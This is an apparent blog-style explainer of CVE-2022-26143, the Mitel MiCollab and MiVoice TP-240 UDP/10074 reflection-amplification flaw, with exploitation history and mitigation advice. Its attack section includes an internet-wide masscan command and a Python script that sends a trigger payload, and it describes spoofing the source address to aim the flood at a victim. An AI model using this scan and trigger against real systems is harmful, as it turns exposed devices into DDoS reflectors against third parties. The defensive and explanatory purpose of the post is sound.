CVE-2022-26143 is a critical security vulnerability in the TP-240 driver (tp240dvr) component of Mitel MiCollab (before version 9.4 SP1 FP1) and MiVoice Business Express (through version 8.1). The flaw lets unauthenticated remote attackers obtain sensitive information and cause a denial of service on the device itself (performance degradation and excessive outbound traffic). That same excessive outbound traffic is what makes an exposed device usable as a reflector in DDoS attacks against third parties.

In early 2022 (February and March) attackers began exploiting this bug in the wild as the reflection/amplification vector that researchers named TP240PhoneHome. This post breaks it down in plain language and then gets into the technical and code details.

A Quick Look at the TP-240 (tp240dvr) Component

The tp240dvr driver manages the TP-240 VoIP processing interface in these Mitel systems; think of it as the component that takes internal telephony traffic, processes it, and hands it on. Alongside that job it exposes a command and test facility on UDP port 10074 (by default). That facility exists for internal diagnostics and stress testing and was never meant to be reachable from the internet, but on exposed systems it executes commands from anyone who sends them.

Here's what makes the bug dangerous

1. Unauthenticated Network Service: No login or handshake is required. Anyone who can reach the UDP port can issue commands to tp240dvr.

2. Reflected Amplification: The service does not merely answer a query with a larger reply. A single command starts a stress-test routine that makes the device emit a stream of status packets for a long time, so a tiny request turns into an enormous volume of output.

3. Sensitive Data Leak: Some responses include internal status information that is useful to an attacker.

4. DDoS Helper: Attackers spoof the source address of the trigger packet, so the amplified stream is delivered to the victim rather than to them, overwhelming the victim's network.

[Image: CVE-2022-26143 Amplification]

1. Finding Vulnerable Servers

Attackers look for Mitel systems exposing UDP port 10074 to the internet (the coordinated disclosure counted roughly 2,600 such systems).

# Use masscan to quickly map the internet
masscan -pU:10074 --rate=100 .../

2. Sending a Trigger Packet

Attackers send a crafted UDP packet. Here is a simplified Python snippet (for educational purposes only); note that UDP gives no delivery guarantee, so the socket needs a timeout or recvfrom() blocks forever when nothing answers:

import socket

target_ip = "TARGET_PUBLIC_IP"
target_port = 10074

# The trigger bytes as given in this post
payload = bytes.fromhex('000000000000000c0000000200000002')

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)  # without this, recvfrom() hangs if the target stays silent
sock.sendto(payload, (target_ip, target_port))
try:
    data, _ = sock.recvfrom(4096)
    print(f"Received {len(data)} bytes in response.")
except socket.timeout:
    print("No response within 5 seconds.")
finally:
    sock.close()

> The dangerous part is not the size of one reply. According to the coordinated disclosure (Cloudflare, Netscout and partners), a single spoofed trigger packet can make an exposed device emit up to 4,294,967,294 status packets, potentially for many hours unless the test is stopped: a packet amplification ratio of 4,294,967,294:1 and a bandwidth amplification ratio of roughly 2,200,288,816:1, by far the highest ratio reported for any UDP reflection vector at the time.

3. DDoS Reflection

To direct the amplified traffic at a victim, the attacker spoofs the source IP of the trigger packet. Instead of the attacker receiving the stream, the victim does. Because the output dwarfs the trigger, one attacker using many exposed Mitel systems as "reflectors" can flood large networks while sending almost nothing themselves.

Evidence of Real-World Exploitation

- February–March 2022: Threat actors abuse roughly 2,600 exposed Mitel systems as reflectors, introducing a new amplification DDoS vector with a record-setting ratio.
- Researchers from Netscout, Cloudflare, and their partners in the coordinated disclosure (Akamai, Lumen Black Lotus Labs, Team Cymru, Telus, and Shadowserver, working with Mitel) report seeing these reflection campaigns in the wild:
 - Cloudflare blog: "Mitel DDoS amplification attack"
 - Netscout: "Mitel Device Reflector Attack"
 - Original CVE entry

Mitigation

- Upgrade MiCollab to 9.4 SP1 FP1 or later, and MiVoice Business Express to a release newer than 8.1 that contains Mitel's fix (the advisory lists the exact builds).
- Do not expose UDP/10074 to the internet. Restrict it to the management network with a perimeter firewall or ACL; the test facility has no legitimate external callers.
- Network operators can filter inbound UDP traffic with source port 10074 at the edge while an attack is under way, and should deploy anti-spoofing (BCP 38) so their own customers cannot forge trigger packets.

- Official Mitel advisory: Mitel Security Bulletin

Technical Summary

- Vulnerability: Unauthenticated UDP command/test service on port 10074 that reflects and massively amplifies traffic and leaks internal information.
- CVSS: 9.8 Critical (CVSS v3.1 base score, per NVD)
- How to Fix: Patch, and block UDP/10074 from everything except the management network
- Original Disclosure: CVE-2022-26143 NVD, Mitel Advisory 22-0002

Final Thoughts

CVE-2022-26143 stands as a textbook example of why unauthenticated, internet-exposed services are dangerous. Even a telephony device can be repurposed as a DDoS cannon by bad actors. If you or your business runs Mitel equipment, patch now—never assume your phone gear is "safe enough" just because it isn’t a web server!

Sources

- CVE-2022-26143 on NVD
- Mitel Official Security Advisory 22-0002
- Cloudflare Blog on Mitel DDoS
- Netscout DDoS Reflection Report

Timeline

Published on: 03/10/2022 17:47:00 UTC
Last modified on: 03/18/2022 19:52:00 UTC